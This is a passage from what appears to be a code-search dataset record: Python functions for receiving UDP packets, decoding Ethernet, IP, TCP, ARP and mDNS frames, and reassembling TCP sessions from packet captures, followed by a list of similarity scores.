udpSocket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)\n # print(\"New sock state: %s\" % new_state)\n\n # bind socket\n try:\n udpSocket.bind((\"\", udp_port))\n udpSocket.settimeout(0.06)\n except socket.error as err_msg:\n print(\"Udp socket message:%s\" % err_msg)\n return\n\n udp_buf = 1304\n pkt_cnt = cnt\n messages = []\n while True:\n dat, add = udpSocket.recvfrom(udp_buf)\n if (dat[0:2] == b'\\xaa\\xaa') or (dat[0:2] == b'\\xbb\\xbb') or (dat[0:2] == b'\\xcc\\xcc'):\n # print(add[0], add[1], hex(ord(dat[2])) + '{:02x}'.format(ord(dat[3])) )\n # print(add[0], add[1], '0x{:02X} 0x{:02X}'.format(dat[2], dat[3]))\n print(\"Recv ok source ip and port is \", add)\n messages.append(dat + b'\\n')\n if pkt_cnt > 1:\n for _ in range(pkt_cnt - 1):\n datfrm, add = udpSocket.recvfrom(udp_buf)\n messages.append(datfrm + b'\\n')\n break\n else:\n break\n\n return messages # return string", "def decode(self, eth):\n\t\tif eth.type == dpkt.ethernet.ETH_TYPE_ARP:\n\t\t\t# print 'arp'\n\t\t\treturn ARP(eth.data).get()\n\n\t\telif eth.type == dpkt.ethernet.ETH_TYPE_IP6:\n\t\t\tip = eth.data\n\t\t\tif ip.p == dpkt.ip.IP_PROTO_UDP:\n\t\t\t\tudp = ip.data\n\n\t\t\t\t# multicast is just like IPv4\n\t\t\t\tif udp.dport == 5353:\n\t\t\t\t\t# print udp\n\t\t\t\t\tans = mDNS(udp).get()\n\t\t\t\t\t# print 25*'='\n\t\t\t\t\t# pp.pprint(ans)\n\t\t\t\t\t# print 25*'='\n\t\t\t\t\treturn ans\n\n\t\t\t\t# print 'IPv6 UDP','port:',udp.dport,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\n\t\t\t# TCP not useful\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_TCP:\n\t\t\t\tpass\n\t\t\t\t# tcp = ip.data\n\t\t\t\t# print 'IPv6 TCP','port:',tcp.dport,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\n\t\t\t# ICMP error msg not useful for mapping\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_ICMP6:\n\t\t\t\t# print 'IPv6 icmp6:',ip.data.data\n\t\t\t\tpass\n\n\t\t\t# other stuff I haven't decoded\n\t\t\telse:\n\t\t\t\tpass\n\t\t\t\t# print 'IPv6',ip.p,'src:',self.getip(ip.src,True),'dst:',self.getip(ip.dst,True)\n\t\telif eth.type == dpkt.ethernet.ETH_TYPE_IP:\n\t\t\tip = eth.data\n\n\t\t\t# roku interface port: 1900 dst: 239.255.255.250 1900\n\t\t\tif ip.p == dpkt.ip.IP_PROTO_UDP:\n\t\t\t\tudp = ip.data\n\n\t\t\t\t# these aren't useful\n\t\t\t\tif udp.dport == 53: # 
DNS\n\t\t\t\t\t# return DNS(udp.data)\n\t\t\t\t\treturn {}\n\n\t\t\t\telif udp.dport == 5353: # mDNS\n\t\t\t\t\t# print 'mDNS'\n\t\t\t\t\t# print udp\n\t\t\t\t\treturn mDNS(udp).get()\n\n\t\t\t\telif self.getip(ip.dst) == '239.255.255.250':\n\t\t\t\t\treturn {}\n\n\t\t\t\telse:\n\t\t\t\t\t# don't print standard ports\n\t\t\t\t\t# 17500 dropbox\n\t\t\t\t\t# if not ip.data.dport in [17500]:\n\t\t\t\t\t# \tprint 'other udp','port:',udp.dport,'src:',self.getip(ip.src),'dst:',self.getip(ip.dst),': '\n\t\t\t\t\treturn {}\n\t\t\telif ip.p == dpkt.ip.IP_PROTO_TCP:\n\t\t\t\t# src = self.getip(ip.src)\n\t\t\t\t# if netaddr.IPAddress(src) not in netaddr.IPNetwork(\"192.168.1.0/24\"):\n\t\t\t\t# \twho = ''\n\t\t\t\t# \tif src not in self.ipMap:\n\t\t\t\t# \t\twho = WhoIs(src).record['NetName']\n\t\t\t\t# \t\tself.ipMap[src] = who\n\t\t\t\t# \telse:\n\t\t\t\t# \t\twho = self.ipMap[src]\n\t\t\t\t# \tif who in ['GOOGLE','AKAMAI','APPLE-WWNET','AMAZO-ZIAD1','DROPBOX']:\n\t\t\t\t# \t\treturn {}\n\t\t\t\t# \telse:\n\t\t\t\t# \t\tprint src,who\n\t\t\t\t# don't print standard ports\n\t\t\t\t# port 58969 - XSANS Apple, why do i see that?\n\t\t\t\t# 22 ssh\n\t\t\t\t# 25 smtp\n\t\t\t\t# 80 http\n\t\t\t\t# 123 time server\n\t\t\t\t# 143 imap\n\t\t\t\t# 443 https\n\t\t\t\t# 445 smb\n\t\t\t\t# 548 afp over tcp\n\t\t\t\t# 5009 airport admin utility\n\t\t\t\t# 5222 ichat\n\t\t\t\t# 17500 dropbox\n\t\t\t\t# if not ip.data.dport in [22,25,80,123,143,443,445,548,5009,5222,17500]:\n\t\t\t\t\t# print 'other tcp','port:',ip.data.dport,'src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\t\treturn {}\n\t\t\t# elif ip.p == dpkt.ip.IP_PROTO_ICMP6:\n\t\t\t# \tprint '?????? other icmp6','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\telif ip.p == 2:\n\t\t\t\tpass\n\t\t\t\t# print 'IGMP','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\telse:\n\t\t\t\t# print 'other ip packet','src:',self.getip(ip.src),'dst:',self.getip(ip.dst)\n\t\t\t\treturn {}", "def getBriefPacket(self):\n\n # briefPacket = NamedTuple('Brief Packet',\n # ['no', 'time', 'source', 'destination',\n # 'protocol', 'length'])\n return (self.pktIndex, self.pktTime, self.pktSrc,\n self.pktDst, self.pktProt, self.pktLen, self.pktStack)", "def _do_some_logic(self, packet):\n\n\n pass", "def __recv_frame(self) -> Dict[str, Any]:\n # Grab a packet\n packets = self.sock.recvfrom(Sniffer.RECEIVE_SIZE)\n address = self.__process_address(packets[1])\n packet = packets[0]\n offset = 0\n\n # Make sure its a valid packet\n eth_header = self.__process_ethframe(packet[offset:(offset + Sniffer.ETH_HEADER_LENGTH)])\n offset = offset + eth_header['header_length']\n\n if eth_header['protocol'] != 8:\n # Not IP\n raise UnknownPacketException(\n 'Unknown frame {}'.format(eth_header['protocol'])\n )\n\n # Get the IP header\n ip_header = self.__process_ipframe(packet[offset:(offset + Sniffer.IP_HEADER_LENGTH)])\n offset = offset + ip_header['header_length']\n\n if ip_header['protocol'] != 6:\n # Not TCP\n raise UnknownPacketException(\n 'Unknown protocol {}'.format(ip_header['protocol']),\n )\n\n # Get TCP header\n tcp_header = self.__process_tcpframe(packet[offset:(offset + Sniffer.TCP_HEADER_LENGTH)])\n offset = offset + tcp_header['header_length']\n\n # Get payload length\n payload_length = ip_header['length'] - ip_header['header_length'] - tcp_header['header_length']\n\n # Get payload\n data = packet[offset:offset + payload_length]\n\n return {\n 'ip_header': ip_header,\n 'tcp_header': tcp_header,\n 'data': data,\n 'address': address,\n }", "def 
__process_tcpframe(self, tcp_header: bytes) -> Dict[str, Any]:\n tcph = struct.unpack('!HHLLBBHHH', tcp_header)\n\n # Normal stuff\n source_port = tcph[0]\n dest_port = tcph[1]\n sequence = tcph[2]\n acknowledgement = tcph[3]\n tcphl = (tcph[4] >> 4) * 4\n\n # TCP flags\n flags = ((tcph[4] & 1) << 8) | tcph[5]\n\n return {\n 'header_length': tcphl,\n 'source_port': source_port,\n 'destination_port': dest_port,\n 'sequence': sequence,\n 'acknowledgement': acknowledgement,\n 'flags': self.__process_flags(flags),\n }", "def _process(self, buf, ts=None, pkt_num=None):\n\n if not buf:\n return\n self.pkt_num = pkt_num\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n tcp = ip.data\n sip = inet_to_str(ip.src)\n dip = inet_to_str(ip.dst)\n fin_flag = tcp.flags & 0x001\n ack_flag = tcp.flags & 0x010\n syn_flag = tcp.flags & 0x002\n rst_flag = tcp.flags & 0x004\n syn_unacceptable_states = [TCPState.ESTABLISHED, TCPState.FIN_WAIT_1, TCPState.FIN_WAIT_2,\n TCPState.CLOSING, TCPState.LAST_ACK]\n data_acceptable_states = [TCPState.ESTABLISHED, TCPState.CLOSE_WAIT]\n tcp_opts = dpkt.tcp.parse_opts(tcp.opts) if tcp.opts else None\n tcp_opts = tcp_opts_tuple_list_to_dict(tcp_opts) if tcp_opts else None\n num_pkt_session_pkt = len(self.sessions[self.session_count]) if self.session_count else 0\n\n # Only Window size can change in ACKs (in other words - after SYNs), nothing else like - window-scaling, or\n # MSS, or Selective-SYN can't be changed. If present in options after SYN, should be ignored in my opinion\n # https://superuser.com/questions/966212/does-the-sequence-number-of-tcp-packet-headers-wrap-around\n # TODO: seq number in coming packet is ahead of the expected one, then it should be held for processing\n\n def slide_window():\n\n if len(self.sessions[self.session_count]):\n if sip == self.sip:\n if self._s_mss != -1 and get_tcp_packet_payload_len_with_options(eth) > self._s_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_c_pkt()).data\n rcv_nxt = self._s_rcv_next\n win_left_end = self._s_win_left_edge\n early_pkts = self._s_early_pkts\n other_end_win_size = self._s_win_size\n current_state = self._c_state\n else:\n if self._c_mss != -1 and get_tcp_packet_payload_len_with_options(ip) > self._c_mss:\n return\n prev_ip = dpkt.ethernet.Ethernet(self.get_last_s_pkt()).data\n rcv_nxt = self._c_rcv_next\n win_left_end = self._c_win_left_edge\n early_pkts = self._c_early_pkts\n other_end_win_size = self._c_win_size\n current_state = self._s_state\n if self._print_debug_info:\n logger.debug(self.client_server_next_rcv(), tcp_pkt_debug_info(ip))\n prev_tcp = prev_ip.data\n prev_tcp_data_offset = prev_tcp.off * 4\n prev_ip_header_len = prev_ip.hl * 4\n prev_tcp_payload_len = prev_ip.len - (prev_tcp_data_offset + prev_ip_header_len)\n tcp_payload_len = get_tcp_packet_payload_len(ip)\n if (tcp_seq_number_in_window(win_left_end, tcp.seq, other_end_win_size) or\n tcp_seq_number_in_window(win_left_end,\n inc_tcp_seq_number(tcp.seq, tcp_payload_len), other_end_win_size)):\n if inc_tcp_seq_number(tcp.seq, tcp_payload_len) == rcv_nxt:\n \"\"\"\n \n Since there is no new payload sent, just store the tcp packet with empty payload.\n This is going to increase the packet count but not going to add duplicated data\n in session data, by session data here it means actual data sent (after discarding\n the retransmission) to application layer. To do that - we will empty out the payload,\n if packets has some, then add the packet to the session, else add the empty packet as it is\n to the session. 
This logic will easily handle the TCP connections supporting\n TCP Timestamp options describe in https://tools.ietf.org/html/rfc1323\n \n \"\"\"\n # one case is when seq number is < rcv_nxt but sender want to ack more data\n # which means it is sending the same data again but its acking more received content\n \"\"\"\n 1. packet has Data\n a. prev_packet has data\n A. header change (change cur packet and change previous packet) add to list\n B. no header change retransmission ( sum check)\n b. prev_packete has no data\n A. header change (change cur packet only) add to list\n B. no header change retransmission (change cur packet only)\n 2. packet has no data\n a. prev_packet has data\n A. header change (change previous packet only) add to list\n B. no header change (change previous packet only)\n b. prev_packet has no data\n A. header change (sum check) add to list\n B. no header change retransmission (sum check)\n \"\"\"\n if prev_tcp.sum == tcp.sum:\n cur_sum = tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack())\n prev_sum = tcp_shasum_calc(prev_ip.src, prev_ip.dst, prev_ip.p, prev_ip.data.pack())\n if cur_sum == prev_sum:\n # covers 1.a.B and 2.b.B\n return\n\n empty_prev_ip = copy.deepcopy(prev_ip)\n empty_prev_tcp = empty_prev_ip.data\n empty_prev_tcp.seq = rcv_nxt\n empty_prev_ip.len -= prev_tcp_payload_len\n empty_prev_tcp.data = b\"\"\n empty_prev_ip = tcp_fix_checksum(empty_prev_ip)\n new_part_ip = copy.deepcopy(ip)\n new_part_tcp = new_part_ip.data\n new_part_tcp.data = b\"\"\n new_part_tcp.seq = rcv_nxt\n new_part_ip.len -= tcp_payload_len\n new_part_ip.sum = 0\n new_part_tcp.sum = 0\n new_part_ip = tcp_fix_checksum(new_part_ip)\n eth.data = new_part_ip\n cur_pkt = eth.pack()\n new_pkt = dpkt.ethernet.Ethernet(cur_pkt)\n new_part_ip = new_pkt.data\n new_part_tcp = new_part_ip.data\n\n \"\"\"\n Checksum comparision logic is kept to discard the straight duplicates packets\n without Timestamp Options. 
These kind of packet will not serve any purposes.\n If removal of these checksum comparison code blocks felt necessary, it could\n be removed -- that will add few extra retransmitted packets -- but that would\n also requrie to update the testcases built around this code blocks.\n \"\"\"\n if new_part_tcp.sum == empty_prev_tcp.sum:\n # covers 1.b.B\n # covers case 2.a.B\n if tcp_shasum_calc(ip.src, ip.dst, ip.p, ip.data.pack()) == tcp_shasum_calc(\n prev_ip.src, prev_ip.dst, prev_ip.p, empty_prev_ip.data.pack()):\n return\n \"\"\"\n needs to added to list under cases 2.a.A, 2.b.A, 1.a.A and 1.b.A\n cur_pkt is updated earlier\n \"\"\"\n if sip == self.sip:\n if inc_tcp_seq_number(self._c_rcv_next, 1) <= new_part_tcp.ack:\n self._c_rcv_next = new_part_tcp.ack\n else:\n if inc_tcp_seq_number(self._s_rcv_next, 1) <= new_part_tcp.ack:\n self._s_rcv_next = new_part_tcp.ack\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(tcp.seq, rcv_nxt, tcp_payload_len)):\n stale_data_len = seq_numbers_diff(tcp.seq, rcv_nxt)\n win_right_end = inc_tcp_seq_number(win_left_end, other_end_win_size)\n if tcp_seq_number_in_window(rcv_nxt, inc_tcp_seq_number(tcp.seq, tcp_payload_len),\n seq_numbers_diff(rcv_nxt, win_right_end)):\n tcp.data = tcp.data[stale_data_len:]\n else:\n allowed_payload_size = seq_numbers_diff(rcv_nxt, win_right_end)\n remaining_eth = dpkt.ethernet.Ethernet(eth.pack())\n #remaining_ip = eth.data\n #remaining_tcp = remaining_ip.data\n remaining_eth.data.data.seq = inc_tcp_seq_number(tcp.seq, stale_data_len + allowed_payload_size)\n remaining_eth.data.data.data = tcp.data[stale_data_len + allowed_payload_size:]\n remaining_eth.data.len -= stale_data_len + allowed_payload_size\n remaining_eth.data = tcp_fix_checksum(remaining_eth.data)\n #remaining_eth.data = remaining_ip\n tcp.data = tcp.data[stale_data_len: stale_data_len + allowed_payload_size]\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), remaining_eth.pack()))\n tcp.sum = 0\n # ip.len -= stale_data_len\n tcp.seq = rcv_nxt\n ip.data = tcp\n ip.sum = 0\n eth.data = ip\n cur_pkt = eth.pack()\n if sip == self.sip:\n self._s_rcv_next = inc_tcp_seq_number(self._s_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n else:\n self._c_rcv_next = inc_tcp_seq_number(self._c_rcv_next,\n (ip.len - (ip.hl * 4 + tcp.off * 4)))\n elif (current_state in data_acceptable_states and\n tcp_seq_number_in_window(rcv_nxt, tcp.seq, other_end_win_size)):\n # hold it for further processing\n if self.sip == sip:\n self._s_early_pkts.append(((ts, self.pkt_num), buf))\n else:\n self._c_early_pkts.append(((ts, self.pkt_num), buf))\n return\n else:\n return\n self.sessions[self.session_count].append(((ts, self.pkt_num), cur_pkt))\n # as this packet is accepted, might need to update the rwnd size and left end of rwnd\n if sip == self.sip:\n self._c_payload_size += len(eth.data.data.data)\n logger.debug(\"Client send data size: {}. 
Accepted data size is: {}.\"\n \" Total data sent from client is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._c_payload_size))\n self._c_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._s_rcv_next\n if (not tcp.ack == self._c_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._c_win_left_edge, 1),\n tcp.ack, self._c_win_size)):\n self._c_win_left_edge = tcp.ack\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n else:\n self._s_payload_size += len(eth.data.data.data)\n logger.debug(\"Server send data of size: {}. Accepted data size is: {}.\"\n \" Total data sent from server is: {}\".format(\n len(tcp.data), len(eth.data.data.data), self._s_payload_size))\n self._s_prev_pkt_ind = len(self.sessions[self.session_count]) - 1\n rcv_nxt = self._c_rcv_next\n # left edge is incremented by one becuase in_window function checks for inclusive seq number\n # starting at left edge but ACK tells what's the next expected seq number, which could be 1 next\n # to the end of window\n if (not tcp.ack == self._s_win_left_edge and\n tcp_seq_number_in_window(inc_tcp_seq_number(self._s_win_left_edge, 1),\n tcp.ack, self._s_win_size)):\n self._s_win_left_edge = tcp.ack\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n # check if packet at the head of queue is ready to be processed\n while True:\n if len(early_pkts) == 0:\n break\n (_ts, _pkt_num), _buf = early_pkts.popleft()\n early_eth = dpkt.ethernet.Ethernet(_buf)\n early_ip = early_eth.data\n early_tcp = early_ip.data\n if tcp_seq_number_in_window(early_tcp.seq, rcv_nxt, get_tcp_packet_payload_len(early_ip)):\n # if early_tcp.seq <= rcv_nxt:\n self._process(early_eth.pack(), _ts, _pkt_num)\n else:\n early_pkts.appendleft(((_ts, _pkt_num), early_eth.pack()))\n break\n\n \"\"\"\n TCP flags:0x000 (12 bits)\n [11 10 9 8 7 6 5 4 3 2 1 0]\n - Bit 11 10 9: reserved\n - Bit 8: nonce\n - Bit 7: CWR (Congestion window reduced)\n - Bit 6: ECN-Echo (Explicit Congestion Notification)\n - Bit 5: Urgent\n - Bit 4: ACK\n - Bit 3: Push\n - Bit 2: Reset\n - Bit 1: SYN\n - Bit 0: FIN\n \"\"\"\n\n \"\"\"TCP flags for SYN [000000010111]\"\"\"\n\n prev_c_pkt = dpkt.ethernet.Ethernet(self.get_last_c_pkt()) if self.get_last_c_pkt() else None\n prev_c_tcp = prev_c_pkt.data.data if prev_c_pkt else None\n prev_s_pkt = dpkt.ethernet.Ethernet(self.get_last_s_pkt()) if self.get_last_s_pkt() else None\n prev_s_tcp = prev_s_pkt.data.data if prev_s_pkt else None\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n logger.debug(\"Processing packet number: {} in the current session\".format(self.pkt_num))\n if rst_flag:\n logger.info(\"Received a RESET flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING:\n self.session_count += 1\n self.sessions[self.session_count] = [((ts, self.pkt_num), buf)]\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n return\n self._c_state = self._s_state = TCPState.CLOSED\n if self.sip == sip:\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n else:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: 
{}\".format(self.get_printable_state()))\n elif syn_flag and (self._c_state in syn_unacceptable_states or self._s_state in syn_unacceptable_states):\n logger.info(\"Received a unacceptable SYN flag, packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts,self.pkt_num), buf))\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif (self._c_state == TCPState.CLOSED and self._s_state == TCPState.LISTENING and\n self.sip == sip):\n if tcp.flags & 0x017 == 0x002:\n self.session_count += 1\n logger.info(\"number of sessions so far: {}\".format(self.session_count - 1))\n logger.info(\"starting a new session, pkt info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n self.sessions[self.session_count] = []\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_state = TCPState.SYN_SENT\n self._s_state = TCPState.SYN_RECEIVED\n self._c_seq = tcp.seq\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._c_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._c_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._c_win_scaling_factor = 0\n self._c_mss = -1\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"SYN flag from: {}:{}. Full TCP Flag is: {}\".format(self.sip, self.sp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n\n elif self._c_state == TCPState.SYN_SENT and self._s_state == TCPState.SYN_RECEIVED:\n logger.info(\"TCP packet info: {}\".format(tcp_pkt_debug_info(ip)))\n logger.info(\"TCP state before processing of packet: {}\".format(self.get_printable_state()))\n if self.sip == dip:\n exp_ack = inc_tcp_seq_number(prev_c_tcp.seq, 1)\n if not (tcp.flags & 0x017 == 0x012):\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"SYN-ACK flag is not set in the TCP flags: {} from: {}:{}\".format(hex(tcp.flags),\n self.dip, self.dp))\n return\n if tcp.ack == exp_ack:\n self._s_prev_pkt_ind = len(self.sessions[self.session_count])\n self._s_rcv_next = exp_ack\n self._s_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n if tcp_opts:\n if dpkt.tcp.TCP_OPT_WSCALE in tcp_opts:\n self._s_win_scaling_factor = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_WSCALE], \"big\")\n if dpkt.tcp.TCP_OPT_MSS in tcp_opts:\n self._s_mss = int.from_bytes(tcp_opts[dpkt.tcp.TCP_OPT_MSS], \"big\")\n else:\n self._s_win_scaling_factor = 0\n self._s_mss = -1\n self._s_win_size = tcp.win << self._s_win_scaling_factor\n logger.info(\"SYN-ACK flag from: {}:{}. 
Full TCP flag is: {}\".format(\n self.dip, self.dp, hex(tcp.flags)))\n logger.info(\"TCP options in the packet: {}\".format(tcp_pkt_options_debug_info(tcp)))\n elif prev_s_tcp:\n exp_ack = inc_tcp_seq_number(prev_s_tcp.seq, 1)\n if tcp.flags & 0x017 == 0x010:\n if tcp.ack == exp_ack and tcp.seq == prev_s_tcp.ack:\n self._s_state = self._c_state = TCPState.ESTABLISHED\n self._c_seq = tcp.seq\n self._c_prev_pkt_ind = len(self.sessions[self.session_count])\n self._c_rcv_next = exp_ack\n self._c_win_left_edge = exp_ack\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n self._c_win_size = tcp.win << self._c_win_scaling_factor\n logger.info(\"TCP handshake complete.\")\n else:\n self._s_state = self._c_state = TCPState.CLOSED\n self.sessions[self.session_count].append(((ts, self.pkt_num), buf))\n logger.info(\"TCP handshake was not completed.\")\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.ESTABLISHED and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n \"\"\" if ACK flag is off drop the segment as per:\n https://tools.ietf.org/html/rfc793#page-37\n \"\"\"\n logger.debug(tcp_pkt_debug_info(ip))\n logger.debug(tcp_pkt_options_debug_info(tcp))\n num_pkt_session_pkt = len(self.sessions[self.session_count])\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received a FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self.sip == sip:\n self._c_state = TCPState.FIN_WAIT_1\n else:\n self._s_state = TCPState.FIN_WAIT_1\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_1 and self._s_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.dip:\n if inc_tcp_seq_number(prev_c_tcp.seq, max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.FIN_WAIT_2\n self._s_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._c_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_1 and self._c_state == TCPState.ESTABLISHED:\n if ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and sip == self.sip:\n if inc_tcp_seq_number(prev_s_tcp.seq, max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack:\n logger.info(\"Received a ACK for FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.FIN_WAIT_2\n self._c_state = TCPState.CLOSE_WAIT\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n if fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n if self._s_state == TCPState.FIN_WAIT_1:\n self._s_state = self._c_state = TCPState.CLOSING\n else:\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.FIN_WAIT_2:\n if sip == self.sip:\n if ack_flag:\n 
slide_window()\n if self._s_state == TCPState.LAST_ACK:\n if (num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_s_tcp.seq,\n max(get_tcp_packet_payload_len(prev_s_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._s_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._s_state == TCPState.FIN_WAIT_2:\n if sip == self.dip:\n if ack_flag:\n slide_window()\n if (self._c_state == TCPState.LAST_ACK and\n num_pkt_session_pkt < len(self.sessions[self.session_count]) and\n inc_tcp_seq_number(prev_c_tcp.seq,\n max(get_tcp_packet_payload_len(prev_c_pkt), 1)) == tcp.ack):\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if self._c_state == TCPState.CLOSE_WAIT and ack_flag:\n slide_window()\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and fin_flag:\n logger.info(\"Received FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.LAST_ACK\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n elif self._c_state == TCPState.CLOSING or self._s_state == TCPState.CLOSING:\n if ack_flag:\n slide_window()\n if sip == self.sip and num_pkt_session_pkt < len(self.sessions[self.session_count]):\n if inc_tcp_seq_number(ack_flag and prev_s_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._s_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n if num_pkt_session_pkt < len(self.sessions[self.session_count]) and \\\n inc_tcp_seq_number(ack_flag and prev_c_tcp.seq, 1) == tcp.ack:\n logger.info(\"ACKed FIN flag: {}\".format(tcp_pkt_debug_info(ip)))\n self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n else:\n logger.info(\"Packet didn't match any valid state: {}\".format(tcp_pkt_debug_info(ip)))\n #self._s_state = self._c_state = TCPState.CLOSED\n logger.info(\"TCP state after processing of packet: {}\".format(self.get_printable_state()))\n logger.debug(self.get_printable_state())", "def get_pkt(self):\n return self.pkt" ]
[ "0.7090595", "0.7003652", "0.69936156", "0.66334194", "0.65440345", "0.65436566", "0.6405004", "0.63479155", "0.6322695", "0.628168", "0.62721276", "0.6175732", "0.60703814", "0.6070341", "0.60200423", "0.60150564", "0.5997884", "0.5978716", "0.5949455", "0.59455645", "0.59366333", "0.59316623", "0.5908739", "0.5888632", "0.5815565", "0.5794967", "0.5792793", "0.5766479", "0.5745804", "0.5722134", "0.57057744", "0.5698816", "0.56907517", "0.5690084", "0.56888646", "0.5677042", "0.56718457", "0.5666656", "0.5659304", "0.5656018", "0.56387657", "0.5601895", "0.5592264", "0.5590224", "0.5581563", "0.55672514", "0.5559262", "0.5549657", "0.55482787", "0.5542988", "0.55420214", "0.55329525", "0.5529724", "0.55243784", "0.55221593", "0.55199355", "0.5512152", "0.5497053", "0.5486876", "0.5465775", "0.54639214", "0.54623127", "0.54518014", "0.54422575", "0.54361063", "0.54315746", "0.54242676", "0.542075", "0.54132926", "0.5406913", "0.5388307", "0.53863066", "0.5380853", "0.53711784", "0.5358242", "0.5358", "0.53401405", "0.5337942", "0.53310907", "0.5326487", "0.5319422", "0.53027225", "0.5301619", "0.5300135", "0.52910924", "0.5287734", "0.5276461", "0.52748907", "0.52716297", "0.52699506", "0.5264523", "0.52564454", "0.5253505", "0.52498305", 